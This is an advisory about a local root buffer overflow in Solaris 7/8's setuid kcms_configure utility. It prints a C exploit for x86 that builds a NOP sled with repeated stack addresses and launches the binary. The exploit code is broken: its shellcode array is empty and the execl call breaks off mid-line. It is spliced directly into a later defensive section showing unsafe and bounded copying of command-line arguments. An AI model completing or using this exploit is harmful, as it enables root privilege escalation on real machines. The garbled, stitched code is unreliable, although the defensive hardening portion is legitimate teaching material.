Solaris 7/8 kcms_configure Command-Line Buffer Overflow Vulnerability (1)

The Kodak Color Management System, or KCMS, is a package that ships with workstation installations of Solaris 7 and 8. kcms_configure, part of KCMS, is vulnerable to a buffer overflow if a local user passes it an overly long string on the command line. Because kcms_configure is installed setuid root, the overflow can lead to arbitrary code execution as root.

An exploit for x86 Solaris is available to attackers. 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFLEN  1100

/* seteuid/exec shellcode  */
char shell[] =

char buf[BUFLEN];
unsigned long int nop, esp;
long int offset = 0;

/* returns the current stack pointer in %eax */
unsigned long int get_esp() { __asm__("movl %esp,%eax"); }

int main(int argc, char *argv[])
{
        int i;

        if (argc > 1)
                offset = strtol(argv[1], NULL, 0);
        else
                offset = -300;
        nop = 600;

        esp = get_esp();
        memset(buf, 0x90, BUFLEN);                  /* fill with NOPs */
        memcpy(buf + 600, shell, strlen(shell));    /* shellcode after the NOPs */
        for (i = nop + strlen(shell) + 1; i <= BUFLEN - 4; i += 4)
                *((int *) &buf[i]) = esp + offset;  /* esp+offset repeated to the end */
        buf[BUFLEN - 1] = '\0';
        execl("/usr/openwin/bin/kcms_configure", "eEye",
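From the defender's side, the defect class is an unbounded copy of a command-line argument into a fixed-size buffer. The following is an added example, not kcms_configure's own code (the advisory does not show its internals): the unsafe pattern beside a bounded version that refuses over-long arguments before any parsing happens. OPTLEN, the function names and the argument-length probe are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size; the real size inside kcms_configure is not stated. */
#define OPTLEN 256

/* Vulnerable pattern: strcpy() has no idea how big opt[] is. An argument
 * longer than OPTLEN-1 bytes writes past the buffer; in a setuid-root
 * program that write is attacker-controlled. Shown for contrast only. */
static int handle_option_unsafe(const char *arg)
{
    char opt[OPTLEN];
    strcpy(opt, arg);
    return (int)strlen(opt);
}

/* Hardened form: bound the scan, reject rather than truncate, then copy.
 * Returns the argument length, or -1 when the argument is refused. */
static int handle_option_safe(const char *arg)
{
    char opt[OPTLEN];
    const char *nul;
    size_t n;

    if (arg == NULL)
        return -1;
    nul = memchr(arg, '\0', OPTLEN);   /* look for the NUL only within OPTLEN */
    if (nul == NULL)
        return -1;                     /* no terminator in range: too long */
    n = (size_t)(nul - arg);
    memcpy(opt, arg, n + 1);           /* n+1 copies the terminating NUL too */
    return (int)n;
}

/* Whole-argv gate: refuse any over-long argument before option parsing. */
static int argv_lengths_ok(int argc, char *argv[])
{
    int i;
    for (i = 1; i < argc; i++)
        if (memchr(argv[i], '\0', OPTLEN) == NULL)
            return 0;
    return 1;
}

/* Test helper: build a constructed argument of len 'A's and run the safe path. */
static int probe_safe(size_t len)
{
    char *a = malloc(len + 1);
    int r;
    memset(a, 'A', len);
    a[len] = '\0';
    r = handle_option_safe(a);
    free(a);
    return r;
}
```

A 1100-byte argument, the size the exploit above builds, is refused by the bounded version instead of being copied.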